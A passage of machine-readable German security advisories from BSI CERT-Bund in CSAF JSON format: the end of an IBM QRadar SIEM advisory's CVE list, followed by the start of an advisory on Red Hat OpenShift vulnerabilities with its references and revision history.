"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-5633"
},
{
"cve": "CVE-2023-5717",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-5717"
},
{
"cve": "CVE-2023-6356",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-6356"
},
{
"cve": "CVE-2023-6535",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-6535"
},
{
"cve": "CVE-2023-6536",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-6536"
},
{
"cve": "CVE-2023-6546",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-6546"
},
{
"cve": "CVE-2023-6606",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-6606"
},
{
"cve": "CVE-2023-6610",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-6610"
},
{
"cve": "CVE-2023-6817",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-6817"
},
{
"cve": "CVE-2023-6931",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-6931"
},
{
"cve": "CVE-2023-6932",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-6932"
},
{
"cve": "CVE-2023-7192",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-7192"
},
{
"cve": "CVE-2024-0565",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2024-0565"
},
{
"cve": "CVE-2024-0646",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2024-0646"
},
{
"cve": "CVE-2024-1086",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2024-1086"
},
{
"cve": "CVE-2024-1488",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2024-1488"
},
{
"cve": "CVE-2024-27269",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2024-27269"
}
]
}
wid-sec-w-2024-1226
Vulnerability from csaf_certbund
Published
2024-05-22 22:00
Modified
2024-11-20 23:00
Summary
Red Hat OpenShift: Mehrere Schwachstellen
Notes
Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.
Produktbeschreibung
Red Hat OpenShift ist eine "Platform as a Service" (PaaS) Lösung zur Bereitstellung von Applikationen in der Cloud.
Angriff
Ein Angreifer kann mehrere Schwachstellen in Red Hat OpenShift ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand zu verursachen, beliebigen Code auszuführen, vertrauliche Informationen offenzulegen, seine Privilegien zu erweitern oder um weitere nicht spezifizierte Angriffe auszuführen.
Betroffene Betriebssysteme
- Linux
{
"document": {
"aggregate_severity": {
"text": "hoch"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
"text": "Red Hat OpenShift ist eine \"Platform as a Service\" (PaaS) L\u00f6sung zur Bereitstellung von Applikationen in der Cloud.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein Angreifer kann mehrere Schwachstellen in Red Hat OpenShift ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand zu verursachen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen offenzulegen, seine Privilegien zu erweitern oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren.",
"title": "Angriff"
},
{
"category": "general",
"text": "- Linux",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
"summary": "WID-SEC-W-2024-1226 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2024/wid-sec-w-2024-1226.json"
},
{
"category": "self",
"summary": "WID-SEC-2024-1226 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2024-1226"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:2874 vom 2024-05-22",
"url": "https://access.redhat.com/errata/RHSA-2024:2874"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:2929 vom 2024-05-22",
"url": "https://access.redhat.com/errata/RHSA-2024:2929"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:2930 vom 2024-05-22",
"url": "https://access.redhat.com/errata/RHSA-2024:2930"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:2932 vom 2024-05-22",
"url": "https://access.redhat.com/errata/RHSA-2024:2932"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:2933 vom 2024-05-22",
"url": "https://access.redhat.com/errata/RHSA-2024:2933"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:2874 vom 2024-05-22",
"url": "https://access.redhat.com/errata/RHSA-2024:3316"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:2901 vom 2024-05-23",
"url": "https://access.redhat.com/errata/RHSA-2024:2901"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:3473 vom 2024-05-29",
"url": "https://access.redhat.com/errata/RHSA-2024:3473"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:3790 vom 2024-06-11",
"url": "https://access.redhat.com/errata/RHSA-2024:3790"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:3715 vom 2024-06-12",
"url": "https://access.redhat.com/errata/RHSA-2024:3715"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:3314 vom 2024-06-13",
"url": "https://access.redhat.com/errata/RHSA-2024:3314"
},
{
"category": "external",
"summary": "RedHat Security Advisory",
"url": "https://access.redhat.com/errata/RHSA-2024:3919"
},
{
"category": "external",
"summary": "Rocky Linux Security Advisory RLSA-2024:3830 vom 2024-06-14",
"url": "https://errata.build.resf.org/RLSA-2024:3830"
},
{
"category": "external",
"summary": "Rocky Linux Security Advisory RLSA-2024:3827 vom 2024-06-14",
"url": "https://errata.build.resf.org/RLSA-2024:3827"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:3868 vom 2024-06-17",
"url": "https://access.redhat.com/errata/RHSA-2024:3868"
},
{
"category": "external",
"summary": "Rocky Linux Security Advisory RLSA-2024:3826 vom 2024-06-14",
"url": "https://errata.build.resf.org/RLSA-2024:3826"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:3889 vom 2024-06-19",
"url": "https://access.redhat.com/errata/RHSA-2024:3889"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:3989 vom 2024-06-20",
"url": "https://access.redhat.com/errata/RHSA-2024:3989"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:4163 vom 2024-06-27",
"url": "https://access.redhat.com/errata/RHSA-2024:4163"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:3637 vom 2024-07-01",
"url": "https://access.redhat.com/errata/RHSA-2024:3637"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:1616 vom 2024-07-01",
"url": "https://access.redhat.com/errata/RHSA-2024:1616"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:3617 vom 2024-07-01",
"url": "https://access.redhat.com/errata/RHSA-2024:3617"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:4269 vom 2024-07-03",
"url": "https://access.redhat.com/errata/RHSA-2024:4269"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:4553 vom 2024-07-16",
"url": "https://access.redhat.com/errata/RHSA-2024:4553"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:4699 vom 2024-07-25",
"url": "https://access.redhat.com/errata/RHSA-2024:4699"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:4455 vom 2024-07-29",
"url": "https://access.redhat.com/errata/RHSA-2024:4455"
},
{
"category": "external",
"summary": "Amazon Linux Security Advisory ALASDOCKER-2024-041 vom 2024-08-13",
"url": "https://alas.aws.amazon.com/AL2/ALASDOCKER-2024-041.html"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:5422 vom 2024-08-20",
"url": "https://access.redhat.com/errata/RHSA-2024:5422"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:5745 vom 2024-08-22",
"url": "https://access.redhat.com/errata/RHSA-2024:5745"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:6667 vom 2024-09-13",
"url": "https://access.redhat.com/errata/RHSA-2024:6667"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:6755 vom 2024-09-18",
"url": "https://access.redhat.com/errata/RHSA-2024:6755"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:7164 vom 2024-09-26",
"url": "https://access.redhat.com/errata/RHSA-2024:7164"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:7184 vom 2024-10-03",
"url": "https://access.redhat.com/errata/RHSA-2024:7184"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:8318 vom 2024-10-23",
"url": "https://access.redhat.com/errata/RHSA-2024:8318"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:8676 vom 2024-10-30",
"url": "https://access.redhat.com/errata/RHSA-2024:8676"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:8677 vom 2024-10-30",
"url": "https://access.redhat.com/errata/RHSA-2024:8677"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:8688 vom 2024-11-06",
"url": "https://access.redhat.com/errata/RHSA-2024:8688"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:8692 vom 2024-11-07",
"url": "https://access.redhat.com/errata/RHSA-2024:8692"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:9088 vom 2024-11-12",
"url": "https://access.redhat.com/errata/RHSA-2024:9088"
},
{
"category": "external",
"summary": "Ubuntu Security Notice USN-7121-2 vom 2024-11-20",
"url": "https://ubuntu.com/security/notices/USN-7121-2"
}
],
"source_lang": "en-US",
"title": "Red Hat OpenShift: Mehrere Schwachstellen",
"tracking": {
"current_release_date": "2024-11-20T23:00:00.000+00:00",
"generator": {
"date": "2024-11-21T13:14:13.553+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.3.8"
}
},
"id": "WID-SEC-W-2024-1226",
"initial_release_date": "2024-05-22T22:00:00.000+00:00",
"revision_history": [
{
"date": "2024-05-22T22:00:00.000+00:00",
"number": "1",
"summary": "Initiale Fassung"
},
{
"date": "2024-05-23T22:00:00.000+00:00",
"number": "2",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-05-30T22:00:00.000+00:00",
"number": "3",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-06-10T22:00:00.000+00:00",
"number": "4",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-06-11T22:00:00.000+00:00",
"number": "5",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-06-13T22:00:00.000+00:00",
"number": "6",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-06-16T22:00:00.000+00:00",
"number": "7",
"summary": "Neue Updates von Rocky Enterprise Software Foundation und Red Hat aufgenommen"
},
{
"date": "2024-06-18T22:00:00.000+00:00",
"number": "8",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-06-19T22:00:00.000+00:00",
"number": "9",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-06-27T22:00:00.000+00:00",
"number": "10",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-06-30T22:00:00.000+00:00",
"number": "11",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-07-02T22:00:00.000+00:00",
"number": "12",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
